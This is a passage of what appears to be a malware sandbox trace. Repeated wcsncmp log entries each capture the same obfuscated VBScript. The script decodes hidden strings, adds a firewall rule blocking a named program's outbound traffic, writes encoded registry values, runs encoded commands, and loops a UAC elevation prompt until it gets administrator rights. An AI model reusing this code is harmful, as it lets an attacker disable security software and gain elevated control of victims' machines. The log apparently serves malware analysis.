str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.374] wcsncmp (_String1="& \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 25 [0226.374] wcsncmp (_String1=" \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.374] wcsncmp (_String1="\">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.375] wcsncmp (_String1=">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 49 [0226.375] wcsncmp (_String1="\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = 